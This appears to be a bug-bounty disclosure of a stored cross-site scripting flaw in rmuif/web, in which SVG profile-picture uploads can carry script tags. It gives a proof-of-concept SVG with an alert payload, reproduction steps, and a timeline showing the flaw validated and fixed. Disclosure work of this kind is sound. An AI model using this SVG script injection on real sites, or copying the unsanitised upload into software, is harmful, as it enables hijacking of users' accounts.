Cross-site Scripting (XSS) - Stored in rmuif/web

Valid

Reported on

Oct 20th 2021

Description

rmuif is vulnerable to XSS. It is possible to use <script> tags in SVG content when uploading a profile picture.

Proof of Concept

SVG content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

1: Save the above content into an SVG file.

2: Access the settings page and upload this file as a profile picture.

3: Access the target file URL.

Impact

This vulnerability is capable of executing arbitrary JS code to perform actions which may compromise the victim's account.

Occurrences

AccountTab.js L141-L186

References

XSS - Portswigger

We have contacted a member of the rmuif/web team and are waiting to hear back 2 years ago

A rmuif/web maintainer validated this vulnerability 2 years ago

Renan Rocha has been awarded the disclosure bounty

The fix bounty is now up for grabs

A rmuif/web maintainer marked this as fixed with commit daa247 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

AccountTab.js#L141-L186 has been validated

to join this conversation

We have contacted a member of the rmuif/web team and are waiting to hear back 2 years ago

A rmuif/web maintainer validated this vulnerability 2 years ago

Renan Rocha has been awarded the disclosure bounty

The fix bounty is now up for grabs

A rmuif/web maintainer marked this as fixed with commit daa247 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

AccountTab.js#L141-L186 has been validated

to join this conversation